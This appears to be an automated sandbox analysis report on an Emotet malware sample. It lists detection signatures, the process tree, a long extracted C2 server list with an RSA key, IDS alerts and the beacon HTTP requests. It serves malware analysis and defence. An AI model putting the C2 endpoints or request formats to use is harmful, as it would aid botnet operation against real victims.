Loading ...

Play interactive tourEdit tour

Analysis Report Eacu0dRnuP

Overview

General Information

Sample Name:Eacu0dRnuP (renamed file extension from none to exe)
Analysis ID:317638
MD5:e79d85ef787e5ee5ab0c1c4962325648
SHA1:137381e0ccf7bb74f2a6b603b0ad7137166a4890
SHA256:dd4b3697f598fcfb9a58ab0f075f7dce217c192ef5b2af6d9377192f60ce3720

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • Eacu0dRnuP.exe (PID: 2160 cmdline: 'C:\Users\user\Desktop\Eacu0dRnuP.exe' MD5: E79D85EF787E5EE5AB0C1C4962325648)
    • KBDTUQ.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\fphc\KBDTUQ.exe MD5: E79D85EF787E5EE5AB0C1C4962325648)
  • svchost.exe (PID: 1092 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 484 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4928 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1752 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5984 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2988 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6216 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6252 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6264 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["80.227.52.78:80", "51.89.199.141:8080", "173.212.214.235:7080", "167.114.153.111:8080", "61.19.246.238:443", "37.179.204.33:80", "190.164.104.62:80", "95.9.5.93:80", "138.68.87.218:443", "176.111.60.55:8080", "194.190.67.75:80", "66.76.12.94:8080", "139.59.60.244:8080", "184.180.181.202:80", "49.50.209.131:80", "24.133.106.23:80", "121.7.31.214:80", "185.94.252.104:443", "50.91.114.38:80", "46.105.131.79:8080", "220.245.198.194:80", "218.147.193.146:80", "115.94.207.99:443", "188.219.31.12:80", "200.116.145.225:443", "190.240.194.77:443", "71.15.245.148:8080", "78.24.219.147:8080", "202.141.243.254:443", "217.123.207.149:80", "110.145.77.103:80", "41.185.28.84:8080", "109.74.5.95:8080", "89.121.205.18:80", "123.142.37.166:80", "91.211.88.52:7080", "113.61.66.94:80", "27.114.9.93:80", "2.58.16.89:8080", "102.182.93.220:80", "120.150.60.189:80", "62.171.142.179:8080", "50.245.107.73:443", "110.142.236.207:80", "72.143.73.234:443", "94.200.114.161:80", "103.86.49.11:8080", "186.70.56.94:443", "176.113.52.6:443", "120.150.218.241:443", "217.20.166.178:7080", "137.59.187.107:8080", "87.106.139.101:8080", "94.230.70.6:80", "100.37.240.62:80", "174.106.122.139:80", "172.86.188.251:8080", "123.176.25.234:80", "190.162.215.233:80", "37.139.21.175:8080", "202.134.4.216:8080", "61.76.222.210:80", "5.39.91.110:7080", "75.143.247.51:80", "74.40.205.197:443", "203.153.216.189:7080", "72.186.136.247:443", "201.241.127.190:80", "24.230.141.169:80", "76.175.162.101:80", "112.185.64.233:80", "49.3.224.99:8080", "119.59.116.21:8080", "37.187.72.193:8080", "95.213.236.64:8080", "162.241.140.129:8080", "78.188.106.53:443", "79.137.83.50:443", "194.4.58.192:7080", "24.137.76.62:80", "157.245.99.39:8080", "173.63.222.65:80", "202.134.4.211:8080", "139.99.158.11:443", "139.162.60.124:8080", "186.74.215.34:80", "154.91.33.137:443", "190.12.119.180:443", "216.139.123.119:80", "59.125.219.109:443", "172.104.97.173:8080", "209.141.54.221:7080", "168.235.67.138:7080", "172.91.208.86:80", "62.75.141.82:80", "121.124.124.40:7080", "172.105.13.66:443", "47.36.140.164:80", "62.30.7.67:443", "24.178.90.49:80", "187.161.206.24:80", "68.115.186.26:80", "94.23.237.171:443", "67.170.250.203:443", "74.208.45.104:8080", "182.208.30.18:443", "67.163.161.107:80", "88.153.35.32:80", "97.82.79.83:80", "74.214.230.200:80", "118.83.154.64:443", "85.105.111.166:80", "93.147.212.206:80", "89.216.122.92:80", "76.27.179.47:80", "190.108.228.27:443", "108.46.29.236:80", "194.187.133.160:443", "134.209.144.106:443", "104.131.11.150:443", "61.33.119.226:443", "80.227.52.78:80", "51.89.199.141:8080", "173.212.214.235:7080", "167.114.153.111:8080", "61.19.246.238:443", "37.179.204.33:80", "190.164.104.62:80", "95.9.5.93:80", "138.68.87.218:443", "176.111.60.55:8080", "194.190.67.75:80", "66.76.12.94:8080", "139.59.60.244:8080", "184.180.181.202:80", "49.50.209.131:80", "24.133.106.23:80", "121.7.31.214:80", "185.94.252.104:443", "50.91.114.38:80", "46.105.131.79:8080", "220.245.198.194:80", "218.147.193.146:80", "115.94.207.99:443", "188.219.31.12:80", "200.116.145.225:443", "190.240.194.77:443", "71.15.245.148:8080", "78.24.219.147:8080", "202.141.243.254:443", "217.123.207.149:80", "110.145.77.103:80", "41.185.28.84:8080", "109.74.5.95:8080", "89.121.205.18:80", "123.142.37.166:80", "91.211.88.52:7080", "113.61.66.94:80", "27.114.9.93:80", "2.58.16.89:8080", "102.182.93.220:80", "120.150.60.189:80", "62.171.142.179:8080", "50.245.107.73:443", "110.142.236.207:80", "72.143.73.234:443", "94.200.114.161:80", "103.86.49.11:8080", "186.70.56.94:443", "176.113.52.6:443", "120.150.218.241:443", "217.20.166.178:7080", "137.59.187.107:8080", "87.106.139.101:8080", "94.230.70.6:80", "100.37.240.62:80", "174.106.122.139:80", "172.86.188.251:8080", "123.176.25.234:80", "190.162.215.233:80", "37.139.21.175:8080", "202.134.4.216:8080", "61.76.222.210:80", "5.39.91.110:7080", "75.143.247.51:80", "74.40.205.197:443", "203.153.216.189:7080", "72.186.136.247:443", "201.241.127.190:80", "24.230.141.169:80", "76.175.162.101:80", "112.185.64.233:80", "49.3.224.99:8080", "119.59.116.21:8080", "37.187.72.193:8080", "95.213.236.64:8080", "162.241.140.129:8080", "78.188.106.53:443", "79.137.83.50:443", "194.4.58.192:7080", "24.137.76.62:80", "157.245.99.39:8080", "173.63.222.65:80", "202.134.4.211:8080", "139.99.158.11:443", "139.162.60.124:8080", "186.74.215.34:80", "154.91.33.137:443", "190.12.119.180:443", "216.139.123.119:80", "59.125.219.109:443", "172.104.97.173:8080", "209.141.54.221:7080", "168.235.67.138:7080", "172.91.208.86:80", "62.75.141.82:80", "121.124.124.40:7080", "172.105.13.66:443", "47.36.140.164:80", "62.30.7.67:443", "24.178.90.49:80", "187.161.206.24:80", "68.115.186.26:80", "94.23.237.171:443", "67.170.250.203:443", "74.208.45.104:8080", "182.208.30.18:443", "67.163.161.107:80", "88.153.35.32:80", "97.82.79.83:80", "74.214.230.200:80", "118.83.154.64:443", "85.105.111.166:80", "93.147.212.206:80", "89.216.122.92:80", "76.27.179.47:80", "190.108.228.27:443", "108.46.29.236:80", "194.187.133.160:443", "134.209.144.106:443", "104.131.11.150:443", "61.33.119.226:443"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.230764484.0000000002861000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.230167872.00000000024A4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.494965360.0000000002214000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000003.00000002.495069915.0000000002261000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.KBDTUQ.exe.2260000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              0.2.Eacu0dRnuP.exe.2860000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["80.227.52.78:80", "51.89.199.141:8080", "173.212.214.235:7080", "167.114.153.111:8080", "61.19.246.238:443", "37.179.204.33:80", "190.164.104.62:80", "95.9.5.93:80", "138.68.87.218:443", "176.111.60.55:8080", "194.190.67.75:80", "66.76.12.94:8080", "139.59.60.244:8080", "184.180.181.202:80", "49.50.209.131:80", "24.133.106.23:80", "121.7.31.214:80", "185.94.252.104:443", "50.91.114.38:80", "46.105.131.79:8080", "220.245.198.194:80", "218.147.193.146:80", "115.94.207.99:443", "188.219.31.12:80", "200.116.145.225:443", "190.240.194.77:443", "71.15.245.148:8080", "78.24.219.147:8080", "202.141.243.254:443", "217.123.207.149:80", "110.145.77.103:80", "41.185.28.84:8080", "109.74.5.95:8080", "89.121.205.18:80", "123.142.37.166:80", "91.211.88.52:7080", "113.61.66.94:80", "27.114.9.93:80", "2.58.16.89:8080", "102.182.93.220:80", "120.150.60.189:80", "62.171.142.179:8080", "50.245.107.73:443", "110.142.236.207:80", "72.143.73.234:443", "94.200.114.161:80", "103.86.49.11:8080", "186.70.56.94:443", "176.113.52.6:443", "120.150.218.241:443", "217.20.166.178:7080", "137.59.187.107:8080", "87.106.139.101:8080", "94.230.70.6:80", "100.37.240.62:80", "174.106.122.139:80", "172.86.188.251:8080", "123.176.25.234:80", "190.162.215.233:80", "37.139.21.175:8080", "202.134.4.216:8080", "61.76.222.210:80", "5.39.91.110:7080", "75.143.247.51:80", "74.40.205.197:443", "203.153.216.189:7080", "72.186.136.247:443", "201.241.127.190:80", "24.230.141.169:80", "76.175.162.101:80", "112.185.64.233:80", "49.3.224.99:8080", "119.59.116.21:8080", "37.187.72.193:8080", "95.213.236.64:8080", "162.241.140.129:8080", "78.188.106.53:443", "79.137.83.50:443", "194.4.58.192:7080", "24.137.76.62:80", "157.245.99.39:8080", "173.63.222.65:80", "202.134.4.211:8080", "139.99.158.11:443", "139.162.60.124:8080", "186.74.215.34:80", "154.91.33.137:443", "190.12.119.180:443", "216.139.123.119:80", "59.125.219.109:443", "172.104.97.173:8080", "209.141.54.221:7080", "168.235.67.138:7080", "172.91.208.86:80", "62.75.141.82:80", "121.124.124.40:7080", "172.105.13.66:443", "47.36.140.164:80", "62.30.7.67:443", "24.178.90.49:80", "187.161.206.24:80", "68.115.186.26:80", "94.23.237.171:443", "67.170.250.203:443", "74.208.45.104:8080", "182.208.30.18:443", "67.163.161.107:80", "88.153.35.32:80", "97.82.79.83:80", "74.214.230.200:80", "118.83.154.64:443", "85.105.111.166:80", "93.147.212.206:80", "89.216.122.92:80", "76.27.179.47:80", "190.108.228.27:443", "108.46.29.236:80", "194.187.133.160:443", "134.209.144.106:443", "104.131.11.150:443", "61.33.119.226:443", "80.227.52.78:80", "51.89.199.141:8080", "173.212.214.235:7080", "167.114.153.111:8080", "61.19.246.238:443", "37.179.204.33:80", "190.164.104.62:80", "95.9.5.93:80", "138.68.87.218:443", "176.111.60.55:8080", "194.190.67.75:80", "66.76.12.94:8080", "139.59.60.244:8080", "184.180.181.202:80", "49.50.209.131:80", "24.133.106.23:80", "121.7.31.214:80", "185.94.252.104:443", "50.91.114.38:80", "46.105.131.79:8080", "220.245.1
                Source: 00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["80.227.52.78:80", "51.89.199.141:8080", "173.212.214.235:7080", "167.114.153.111:8080", "61.19.246.238:443", "37.179.204.33:80", "190.164.104.62:80", "95.9.5.93:80", "138.68.87.218:443", "176.111.60.55:8080", "194.190.67.75:80", "66.76.12.94:8080", "139.59.60.244:8080", "184.180.181.202:80", "49.50.209.131:80", "24.133.106.23:80", "121.7.31.214:80", "185.94.252.104:443", "50.91.114.38:80", "46.105.131.79:8080", "220.245.198.194:80", "218.147.193.146:80", "115.94.207.99:443", "188.219.31.12:80", "200.116.145.225:443", "190.240.194.77:443", "71.15.245.148:8080", "78.24.219.147:8080", "202.141.243.254:443", "217.123.207.149:80", "110.145.77.103:80", "41.185.28.84:8080", "109.74.5.95:8080", "89.121.205.18:80", "123.142.37.166:80", "91.211.88.52:7080", "113.61.66.94:80", "27.114.9.93:80", "2.58.16.89:8080", "102.182.93.220:80", "120.150.60.189:80", "62.171.142.179:8080", "50.245.107.73:443", "110.142.236.207:80", "72.143.73.234:443", "94.200.114.161:80", "103.86.49.11:8080", "186.70.56.94:443", "176.113.52.6:443", "120.150.218.241:443", "217.20.166.178:7080", "137.59.187.107:8080", "87.106.139.101:8080", "94.230.70.6:80", "100.37.240.62:80", "174.106.122.139:80", "172.86.188.251:8080", "123.176.25.234:80", "190.162.215.233:80", "37.139.21.175:8080", "202.134.4.216:8080", "61.76.222.210:80", "5.39.91.110:7080", "75.143.247.51:80", "74.40.205.197:443", "203.153.216.189:7080", "72.186.136.247:443", "201.241.127.190:80", "24.230.141.169:80", "76.175.162.101:80", "112.185.64.233:80", "49.3.224.99:8080", "119.59.116.21:8080", "37.187.72.193:8080", "95.213.236.64:8080", "162.241.140.129:8080", "78.188.106.53:443", "79.137.83.50:443", "194.4.58.192:7080", "24.137.76.62:80", "157.245.99.39:8080", "173.63.222.65:80", "202.134.4.211:8080", "139.99.158.11:443", "139.162.60.124:8080", "186.74.215.34:80", "154.91.33.137:443", "190.12.119.180:443", "216.139.123.119:80", "59.125.219.109:443", "172.104.97.173:8080", "209.141.54.221:7080", "168.235.67.138:7080", "172.91.208.86:80", "62.75.141.82:80", "121.124.124.40:7080", "172.105.13.66:443", "47.36.140.164:80", "62.30.7.67:443", "24.178.90.49:80", "187.161.206.24:80", "68.115.186.26:80", "94.23.237.171:443", "67.170.250.203:443", "74.208.45.104:8080", "182.208.30.18:443", "67.163.161.107:80", "88.153.35.32:80", "97.82.79.83:80", "74.214.230.200:80", "118.83.154.64:443", "85.105.111.166:80", "93.147.212.206:80", "89.216.122.92:80", "76.27.179.47:80", "190.108.228.27:443", "108.46.29.236:80", "194.187.133.160:443", "134.209.144.106:443", "104.131.11.150:443", "61.33.119.226:443", "80.227.52.78:80", "51.89.199.141:8080", "173.212.214.235:7080", "167.114.153.111:8080", "61.19.246.238:443", "37.179.204.33:80", "190.164.104.62:80", "95.9.5.93:80", "138.68.87.218:443", "176.111.60.55:8080", "194.190.67.75:80", "66.76.12.94:8080", "139.59.60.244:8080", "184.180.181.202:80", "49.50.209.131:80", "24.133.106.23:80", "121.7.31.214:80", "185.94.252.104:443", "50.91.114.38:80", "46.105.131.79:8080", "220.245.1
                Multi AV Scanner detection for submitted fileShow sources
                Source: Eacu0dRnuP.exeVirustotal: Detection: 59%Perma Link
                Source: Eacu0dRnuP.exeMetadefender: Detection: 43%Perma Link
                Source: Eacu0dRnuP.exeReversingLabs: Detection: 62%
                Source: Eacu0dRnuP.exeVirustotal: Detection: 59%Perma Link
                Source: Eacu0dRnuP.exeMetadefender: Detection: 43%Perma Link
                Source: Eacu0dRnuP.exeReversingLabs: Detection: 62%
                Machine Learning detection for sampleShow sources
                Source: Eacu0dRnuP.exeJoe Sandbox ML: detected
                Source: Eacu0dRnuP.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02262650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02262290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02261FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_028638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_028638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.2.3:49724 -> 80.227.52.78:80
                Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.3:49730 -> 51.89.199.141:8080
                Source: TrafficSnort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.2.3:49724 -> 80.227.52.78:80
                Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.3:49730 -> 51.89.199.141:8080
                Source: global trafficTCP traffic: 192.168.2.3:49730 -> 51.89.199.141:8080
                Source: global trafficTCP traffic: 192.168.2.3:49730 -> 51.89.199.141:8080
                Source: Joe Sandbox ViewIP Address: 80.227.52.78 80.227.52.78
                Source: Joe Sandbox ViewIP Address: 80.227.52.78 80.227.52.78
                Source: Joe Sandbox ViewIP Address: 80.227.52.78 80.227.52.78
                Source: Joe Sandbox ViewIP Address: 80.227.52.78 80.227.52.78
                Source: Joe Sandbox ViewIP Address: 51.89.199.141 51.89.199.141
                Source: Joe Sandbox ViewASN Name: DU-AS1AE DU-AS1AE
                Source: Joe Sandbox ViewASN Name: DU-AS1AE DU-AS1AE
                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                Source: global trafficTCP traffic: 192.168.2.3:49724 -> 80.227.52.78:80
                Source: global trafficTCP traffic: 192.168.2.3:49724 -> 80.227.52.78:80
                Source: global trafficHTTP traffic detected: POST /kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgqq2ks2YLPn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------sxMmAtOOfKQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4612Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgqq2ks2YLPn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------sxMmAtOOfKQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4612Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 80.227.52.78
                Source: unknownTCP traffic detected without corresponding DNS query: 80.227.52.78
                Source: unknownTCP traffic detected without corresponding DNS query: 80.227.52.78
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 80.227.52.78
                Source: unknownTCP traffic detected without corresponding DNS query: 80.227.52.78
                Source: unknownTCP traffic detected without corresponding DNS query: 80.227.52.78
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: unknownTCP traffic detected without corresponding DNS query: 51.89.199.141
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_022629B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_022629B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,
                Source: unknownHTTP traffic detected: POST /kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgqq2ks2YLPn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------sxMmAtOOfKQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4612Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgqq2ks2YLPn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------sxMmAtOOfKQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4612Cache-Control: no-cache
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgq
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/$f
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/-f
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000004.00000002.498030150.0000022687860000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
